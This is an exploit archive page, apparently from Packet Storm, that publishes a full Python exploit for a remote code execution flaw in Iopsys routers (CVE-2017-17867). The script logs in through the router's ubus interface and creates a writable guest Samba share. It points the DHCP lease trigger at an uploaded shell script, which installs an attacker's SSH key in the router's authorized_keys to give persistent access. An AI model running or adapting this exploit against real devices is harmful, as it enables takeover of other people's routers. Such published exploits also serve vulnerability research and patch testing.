Twenty Year Anniversary

Iopsys Router dhcp Remote Code Execution

Iopsys Router dhcp Remote Code Execution
Posted Jan 4, 2018
Authored by neonsea

Iopsys router suffers from a dhcp related remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2017-17867
MD5 | 54885f686c0eb8621891ad24f69b864c

Iopsys Router dhcp Remote Code Execution

Change Mirror Download
#!/usr/bin/python

import json
import sys
import subprocess
import socket
import os
from time import sleep
from websocket import create_connection

def ubusAuth(host, username, password):
ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
req = json.dumps({"jsonrpc":"2.0","method":"call",
"params":["00000000000000000000000000000000","session","login",
{"username": username,"password":password}],
"id":666})
ws.send(req)
response = json.loads(ws.recv())
ws.close()
try:
key = response.get('result')[1].get('ubus_rpc_session')
except IndexError:
return(None)
return(key)

def ubusCall(host, key, namespace, argument, params={}):
ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
req = json.dumps({"jsonrpc":"2.0","method":"call",
"params":[key,namespace,argument,params],
"id":666})
ws.send(req)
response = json.loads(ws.recv())
ws.close()
try:
result = response.get('result')[1]
except IndexError:
if response.get('result')[0] == 0:
return(True)
return(None)
return(result)

if __name__ == "__main__":
host = "192.168.1.1"
payload = """
#!/bin/sh
/bin/echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAkQMU/2HyXNEJ8gZbkxrvLnpSZ4Xz+Wf3QhxXdQ5blDI5IvDkoS4jHoi5XKYHevz8YiaX8UYC7cOBrJ1udp/YcuC4GWVV5TET449OsHBD64tgOSV+3s5r/AJrT8zefJbdc13Fx/Bnk+bovwNS2OTkT/IqYgy9n+fKKkSCjQVMdTTrRZQC0RpZ/JGsv2SeDf/iHRa71keIEpO69VZqPjPVFQfj1QWOHdbTRQwbv0MJm5rt8WTKtS4XxlotF+E6Wip1hbB/e+y64GJEUzOjT6BGooMu/FELCvIs2Nhp25ziRrfaLKQY1XzXWaLo4aPvVq05GStHmTxb+r+WiXvaRv1cbQ== rsa-key-20170427" > /etc/dropbear/authorized_keys
/usr/sbin/odhcpd-update
exit 0
"""

print("Authenticating...")
key = ubusAuth(host, "user", "password")
if (not key):
print("Auth failed!")
sys.exit(1)
print("Got key: %s" % key)

print("Adding Samba share...")
smbcheck = json.dumps(ubusCall(host, key, "uci", "get",
{"config":"samba"}))
if ("pwned" in smbcheck):
print("Samba share seems to already exist, skipping")
else:
smba = ubusCall(host, key, "uci", "add",
{"config":"samba", "type":"sambashare", "values":
{"name":"pwned", "read_only":"no", "create_mask":"0775", "dir_mask":"0775",
"path":"/mnt/", "guest_ok":"yes"}})
if (not smba):
print("Adding Samba share failed!")
sys.exit(1)

print("Enabling Samba...")
smbe = ubusCall(host, key, "uci", "set",
{"config":"samba", "type":"samba", "values":
{"interface":"lan"}})
if (not smbe):
print("Enabling Samba failed!")
sys.exit(1)

print("Committing changes...")
smbc = ubusCall(host, key, "uci", "commit",
{"config":"samba"})
if (not smbc):
print("Committing changes failed!")
sys.exit(1)

print("Setting malicious leasetrigger...")
lts = ubusCall(host, key, "uci", "set",
{"config":"dhcp", "type":"odhcpd", "values":
{"leasetrigger":"/mnt/pwn.sh"}})
if (not lts):
print("Setting leasetrigger failed!")
sys.exit(1)

print("Committing changes...")
ltc = ubusCall(host, key, "uci", "commit",
{"config":"dhcp"})
if (not ltc):
print("Committing changes failed!")
sys.exit(1)

print("Rebooting system...")
reb = ubusCall(host, key, "juci.system", "reboot")
if (not reb):
print("Rebooting failed, try rebooting manually!")
sys.exit(1)

print("Waiting on reboot...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
isUp = None
while (not isUp):
try:
sleep(10)
s.connect((host, 8080))
isUp = True
s.close()
except:
pass

print("Creating temp file for payload...")
with open(".payload.tmp","a+") as file:
file.write(payload)
path = os.path.realpath(file.name)

print("Dropping payload...")
subprocess.run(r"smbclient \\\\%s\\pwned p -c 'put %s pwn.sh'" % (host, path),
shell=True, check=True)
print("Payload dropped")

print("Authenticating...")
key = ubusAuth(host, "user", "password")
if (not key):
print("Auth failed!")
sys.exit(1)
print("Got key: %s" % key)

print("Executing payload")
eec = ubusCall(host, key, "juci.service", "stop",
{"name":"odhcpd"})
if (not eec):
print("Stopping odhcpd failed!")
sys.exit(1)
ees = ubusCall(host, key, "juci.service", "start",
{"name":"odhcpd"})
if (not ees):
print("Starting odhcpd failed!")
sys.exit(1)

print("Cleaning up...")
os.remove(path)

print("Exploitation complete")

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    26 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    2 Files
  • 7
    Oct 7th
    3 Files
  • 8
    Oct 8th
    23 Files
  • 9
    Oct 9th
    16 Files
  • 10
    Oct 10th
    15 Files
  • 11
    Oct 11th
    19 Files
  • 12
    Oct 12th
    16 Files
  • 13
    Oct 13th
    2 Files
  • 14
    Oct 14th
    2 Files
  • 15
    Oct 15th
    15 Files
  • 16
    Oct 16th
    20 Files
  • 17
    Oct 17th
    19 Files
  • 18
    Oct 18th
    21 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close